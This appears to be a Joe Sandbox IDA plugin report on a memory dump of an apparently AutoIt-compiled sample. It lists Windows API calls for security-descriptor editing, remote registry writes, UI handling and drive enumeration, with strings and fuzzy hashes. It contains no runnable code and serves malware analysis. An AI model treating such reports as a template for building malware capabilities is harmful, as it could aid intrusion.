Part of subcall function 002410F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 00241120
Part of subcall function 002410F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 0024112F
Part of subcall function 002410F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 00241136
Part of subcall function 002410F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0024114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00240DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00240E29
GetLengthSid.ADVAPI32(?), ref: 00240E40
GetAce.ADVAPI32(?,00000000,?), ref: 00240E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00240E96
GetLengthSid.ADVAPI32(?), ref: 00240EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00240EB5
HeapAlloc.KERNEL32(00000000), ref: 00240EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00240EDD
CopySid.ADVAPI32(00000000), ref: 00240EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00240F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00240F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00240F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00240F6E
HeapFree.KERNEL32(00000000), ref: 00240F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00240F7E
HeapFree.KERNEL32(00000000), ref: 00240F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00240F8E
HeapFree.KERNEL32(00000000), ref: 00240F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00240FA1
HeapFree.KERNEL32(00000000), ref: 00240FA8

Part of subcall function 00241193: GetProcessHeap.KERNEL32(00000008,00240BB1,?,00000000,?,00240BB1,?), ref: 002411A1
Part of subcall function 00241193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00240BB1,?), ref: 002411A8
Part of subcall function 00241193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00240BB1,?), ref: 002411B7

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 8163d1e0961e552981dc9cd53e557a847dc6d3290f9e41dfc0923efd14e73255
Instruction ID: 844cb7ce119d0f924cd2717cd09126afe22d29fea8ab4fb2c72aa41157c73310
Opcode Fuzzy Hash: 8163d1e0961e552981dc9cd53e557a847dc6d3290f9e41dfc0923efd14e73255
Instruction Fuzzy Hash: FB71817191020AEFDF249FA4EC88FAEBBB8BF04300F154129FA19E7151DB749995CB60

Function 0026C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0026C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0027CC08,00000000,?,00000000,?,?), ref: 0026C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0026C5A4
_wcslen.LIBCMT ref: 0026C5F4
_wcslen.LIBCMT ref: 0026C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0026C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0026C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0026C84D
RegCloseKey.ADVAPI32(?), ref: 0026C881
RegCloseKey.ADVAPI32(00000000), ref: 0026C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0026C960

Strings

REG_DWORD, xrefs: 0026C804
REG_QWORD, xrefs: 0026C8C3
REG_SZ, xrefs: 0026C644
REG_BINARY, xrefs: 0026C913
REG_EXPAND_SZ, xrefs: 0026C5CD
REG_MULTI_SZ, xrefs: 0026C6F5

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: fbd5d92ade7c10441255ff35962c9426a44fb753d4cbdb38eef5df74aa1a4cb8
Instruction ID: 85c25fc2b1cf179ba6688924edd7abfd552ccbaa937da0f659ce011b7640c637
Opcode Fuzzy Hash: fbd5d92ade7c10441255ff35962c9426a44fb753d4cbdb38eef5df74aa1a4cb8
Instruction Fuzzy Hash: A11278352146419FD715EF25D881A2EB7E5FF88714F24885CF88A9B3A2DB31EC91CB81

Function 0027091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002709C6
_wcslen.LIBCMT ref: 00270A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00270A54
_wcslen.LIBCMT ref: 00270A8A
_wcslen.LIBCMT ref: 00270B06
_wcslen.LIBCMT ref: 00270B81

Part of subcall function 001FF9F2: _wcslen.LIBCMT ref: 001FF9FD

Part of subcall function 00242BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00242BFA

Strings

ISCHECKED, xrefs: 00270CE1
UNCHECK, xrefs: 00270D3E
GETITEMCOUNT, xrefs: 00270C1E
GETSELECTED, xrefs: 00270C4E
GETTEXT, xrefs: 00270C97
CHECK, xrefs: 00270A85, 00270AA0
EXISTS, xrefs: 00270B7C, 00270B97
COLLAPSE, xrefs: 00270B01, 00270B1C
SELECT, xrefs: 00270D11
GETTOTALCOUNT, xrefs: 002709F2, 00270A17
EXPAND, xrefs: 00270BF8

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 398d37a60e56f685dcdc4405eccee05ccf54befd31dbb34301d8474338d6941d
Instruction ID: 8db3f30f393a80d044297816b6870e1c01fbe41c3888b1f3ce405ba42e82e8e4
Opcode Fuzzy Hash: 398d37a60e56f685dcdc4405eccee05ccf54befd31dbb34301d8474338d6941d
Instruction Fuzzy Hash: E0E18C31228742CFC714DF25C49092AB7E1BF99318F14895DF89A5B3A2DB70ED59CB81

Function 0026C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0026B6AE,?,?), ref: 0026C9B5
_wcslen.LIBCMT ref: 0026C9F1
_wcslen.LIBCMT ref: 0026CA68
_wcslen.LIBCMT ref: 0026CA9E
_wcslen.LIBCMT ref: 0026CAF9
_wcslen.LIBCMT ref: 0026CB2F
_wcslen.LIBCMT ref: 0026CB7F

Strings

HKCR, xrefs: 0026CB29, 0026CB2E
HKLM, xrefs: 0026CA98, 0026CA9D
HKEY_CURRENT_CONFIG, xrefs: 0026CB79, 0026CB7E
HKU, xrefs: 0026CBF0
HKCC, xrefs: 0026CBAC
HKEY_LOCAL_MACHINE, xrefs: 0026CA62, 0026CA67
HKCU, xrefs: 0026CBCE
HKEY_CLASSES_ROOT, xrefs: 0026CAF3, 0026CAF8
HKEY_CURRENT_USER, xrefs: 0026CBBD
HKEY_USERS, xrefs: 0026CBDF

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 154293fd3cfd3bb272d0ec6e87564c6241eecc4d3d18c656862df24af12ecd53
Instruction ID: 47aecdf934533dd73ab1c720f64670f48ff2241af890fb34112f3b490cbf8136
Opcode Fuzzy Hash: 154293fd3cfd3bb272d0ec6e87564c6241eecc4d3d18c656862df24af12ecd53
Instruction Fuzzy Hash: 0A71F43263016B8BCB20FEBCCC515BE3395AF61754B350129F89697285EA71CDE583A0

Function 0027833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0027835A
_wcslen.LIBCMT ref: 0027836E
_wcslen.LIBCMT ref: 00278391
_wcslen.LIBCMT ref: 002783B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002783F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00275BF2), ref: 0027844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00278487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 002784CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00278501
FreeLibrary.KERNEL32(?), ref: 0027850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0027851D
DestroyIcon.USER32(?,?,?,?,?,00275BF2), ref: 0027852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00278549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00278555

Strings

.dll, xrefs: 002783AB
.exe, xrefs: 00278388
.icl, xrefs: 00278368

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: f5edcdf25447a6c1f938239bdce72f9eada78d33961c3a2e416823200c396283
Instruction ID: 25cf5900664c83f6abc49e2b811296243304997e97e13b8d3518b03fd76f6e04
Opcode Fuzzy Hash: f5edcdf25447a6c1f938239bdce72f9eada78d33961c3a2e416823200c396283
Instruction Fuzzy Hash: 3A61E2B1560606BAEB14DF74DC89BBF77A8BF04711F108509F919D60D1DFB4A9A0CBA0

Function 001E7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#include, xrefs: 001E7847
Bad directive syntax error, xrefs: 0022519A
#pragma compile, xrefs: 001E77D3
Cannot parse #include, xrefs: 00225279
', xrefs: 00225169
Unterminated group of comments, xrefs: 0022528C
#requireadmin, xrefs: 001E77FF
", xrefs: 00225153
#OnAutoItStartRegister, xrefs: 001E7817
#comments-end, xrefs: 001E78D9
#comments-start, xrefs: 001E785F, 001E78B1
#ce, xrefs: 001E78ED
#include-once, xrefs: 001E782F
#cs, xrefs: 001E7873, 001E78C5
#notrayicon, xrefs: 001E77E7

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 51db1687b9784e040a1c0044ef83f635996f375c5e5b6297405e9e522501a450
Instruction ID: 91dca887424ef2019ec5c0c91a348952392117925ebba6d9982282a183079fe9
Opcode Fuzzy Hash: 51db1687b9784e040a1c0044ef83f635996f375c5e5b6297405e9e522501a450
Instruction Fuzzy Hash: D181FB71A14A15BBEB25AFA1DC46FBF3768AF15300F048024FD09AB1D6EB70D961CB91

Function 00245A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00245A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00245A40
SetWindowTextW.USER32(?,?), ref: 00245A57
GetDlgItem.USER32(?,000003EA), ref: 00245A6C
SetWindowTextW.USER32(00000000,?), ref: 00245A72
GetDlgItem.USER32(?,000003E9), ref: 00245A82
SetWindowTextW.USER32(00000000,?), ref: 00245A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00245AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00245AC3
GetWindowRect.USER32(?,?), ref: 00245ACC
_wcslen.LIBCMT ref: 00245B33
SetWindowTextW.USER32(?,?), ref: 00245B6F
GetDesktopWindow.USER32 ref: 00245B75
GetWindowRect.USER32(00000000), ref: 00245B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00245BD3
GetClientRect.USER32(?,?), ref: 00245BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00245C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00245C2F

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 5712d1fa20faf658ad0a6137c1a8100bbabd3e8fb2d204cd0ab6d8f050f52dec
Instruction ID: 62b2efcacafa0f9f2e25ea43bc8fdceae98f3ed3daa1d08de939c61821214c26
Opcode Fuzzy Hash: 5712d1fa20faf658ad0a6137c1a8100bbabd3e8fb2d204cd0ab6d8f050f52dec
Instruction Fuzzy Hash: D2719C31910B1AAFCB24DFA8CE89AAEBBF5FF48704F10451CE586A25A5D770E950CF50

Function 0025FE0E Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 0025FE27
LoadCursorW.USER32(00000000,00007F8A), ref: 0025FE32
LoadCursorW.USER32(00000000,00007F00), ref: 0025FE3D
LoadCursorW.USER32(00000000,00007F03), ref: 0025FE48
LoadCursorW.USER32(00000000,00007F8B), ref: 0025FE53
LoadCursorW.USER32(00000000,00007F01), ref: 0025FE5E
LoadCursorW.USER32(00000000,00007F81), ref: 0025FE69
LoadCursorW.USER32(00000000,00007F88), ref: 0025FE74
LoadCursorW.USER32(00000000,00007F80), ref: 0025FE7F
LoadCursorW.USER32(00000000,00007F86), ref: 0025FE8A
LoadCursorW.USER32(00000000,00007F83), ref: 0025FE95
LoadCursorW.USER32(00000000,00007F85), ref: 0025FEA0
LoadCursorW.USER32(00000000,00007F82), ref: 0025FEAB
LoadCursorW.USER32(00000000,00007F84), ref: 0025FEB6
LoadCursorW.USER32(00000000,00007F04), ref: 0025FEC1
LoadCursorW.USER32(00000000,00007F02), ref: 0025FECC
GetCursorInfo.USER32(?), ref: 0025FEDC
GetLastError.KERNEL32 ref: 0025FF1E

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 127b649b7ef975ca346f60f315e0d7ae11304891b34c94c681de438e1e5ee247
Instruction ID: b781d9716901b22441e1ce9c39ddeabf87f21472bdbe5eb790016d565c8a249f
Opcode Fuzzy Hash: 127b649b7ef975ca346f60f315e0d7ae11304891b34c94c681de438e1e5ee247
Instruction Fuzzy Hash: 214172B0D0431A6ADB509FBA8C8985EBFE8FF04354B50452AE51DE7681DB78A901CF90

Function 002430F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0024318D
_wcslen.LIBCMT ref: 002431F8

Strings

[*, xrefs: 0024339A
NAME, xrefs: 00243335, 00243346
CLASS, xrefs: 00243188, 002431A5
CLASSNN, xrefs: 002431F3, 00243204
REGEXPCLASS, xrefs: 00243255, 00243266
INSTANCE, xrefs: 00243453
TEXT, xrefs: 0024347C

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[*
API String ID: 176396367-998612648
Opcode ID: 87c5bf9931cf258698161ecb1cdc8318318eeb891d972c66cfd11885b08c859f
Instruction ID: 6abcf6daf3bfbfbde97616f5fe80628f82615368256d41ee50a75c67fa9756a3
Opcode Fuzzy Hash: 87c5bf9931cf258698161ecb1cdc8318318eeb891d972c66cfd11885b08c859f
Instruction Fuzzy Hash: 3EE1F732A20617ABCB1CDF74C4416EEFBB0BF54710F548129E956E7280DF70AEA58B90

Function 002000C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 002000C6

Part of subcall function 002000ED: InitializeCriticalSectionAndSpinCount.KERNEL32(002B070C,00000FA0,AD81C75C,?,?,?,?,002223B3,000000FF), ref: 0020011C
Part of subcall function 002000ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,002223B3,000000FF), ref: 00200127
Part of subcall function 002000ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,002223B3,000000FF), ref: 00200138
Part of subcall function 002000ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0020014E
Part of subcall function 002000ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0020015C
Part of subcall function 002000ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0020016A
Part of subcall function 002000ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00200195
Part of subcall function 002000ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 002001A0

___scrt_fastfail.LIBCMT ref: 002000E7

Part of subcall function 002000A3: __onexit.LIBCMT ref: 002000A9

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 00200122
kernel32.dll, xrefs: 00200133
InitializeConditionVariable, xrefs: 00200148
WakeAllConditionVariable, xrefs: 00200162
SleepConditionVariableCS, xrefs: 00200154

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 735567263aedf6911d6b9b5fc1ac99fb18204d3a315a03151184d53bca78ecd8
Instruction ID: 1abb683090998709eba8c9d48f5f1fb0df7e3899e4a23fe479b8731857d10fef
Opcode Fuzzy Hash: 735567263aedf6911d6b9b5fc1ac99fb18204d3a315a03151184d53bca78ecd8
Instruction Fuzzy Hash: E721F9326647116BF7215F74BC8DB6AB394EB06B51F11413EF90D922D2DFB098108AA0

Function 002544C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0027CC08), ref: 00254527
_wcslen.LIBCMT ref: 0025453B
_wcslen.LIBCMT ref: 00254599
_wcslen.LIBCMT ref: 002545F4
_wcslen.LIBCMT ref: 0025463F
_wcslen.LIBCMT ref: 002546A7

Part of subcall function 001FF9F2: _wcslen.LIBCMT ref: 001FF9FD

GetDriveTypeW.KERNEL32(?,002A6BF0,00000061), ref: 00254743

Strings

network, xrefs: 0025469D, 002546A2
cdrom, xrefs: 0025458F, 00254594
removable, xrefs: 002545EA, 002545EF
all, xrefs: 00254531, 00254536
fixed, xrefs: 00254635, 0025463A
ramdisk, xrefs: 002546F1
unknown, xrefs: 00254708

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 25d8407ac7df93cb66e9d27f486f5ff3588261a3309ffcd75014e9104e54b4ba
Instruction ID: 2ee2c7398f7c3c0dc452ee8a37269dd5860fb09998b997c36bd018fa0de16004
Opcode Fuzzy Hash: 25d8407ac7df93cb66e9d27f486f5ff3588261a3309ffcd75014e9104e54b4ba
Instruction Fuzzy Hash: 27B104316283029FC710EF28C890A7EF7E5AFA5769F50491DF896C7291E730D899CB52

Function 0027911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2

DragQueryPoint.SHELL32(?,?), ref: 00279147

Part of subcall function 00277674: ClientToScreen.USER32(?,?), ref: 0027769A
Part of subcall function 00277674: GetWindowRect.USER32(?,?), ref: 00277710
Part of subcall function 00277674: PtInRect.USER32(?,?,00278B89), ref: 00277720

SendMessageW.USER32(?,000000B0,?,?), ref: 002791B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002791BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002791DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00279225
SendMessageW.USER32(?,000000B0,?,?), ref: 0027923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00279255
SendMessageW.USER32(?,000000B1,?,?), ref: 00279277
DragFinish.SHELL32(?), ref: 0027927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00279371

Strings

@GUI_DRAGID, xrefs: 002792E9
@GUI_DRAGFILE, xrefs: 00279320
@GUI_DROPID, xrefs: 0027929E
p#+, xrefs: 002792BB

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#+
API String ID: 221274066-3707098397
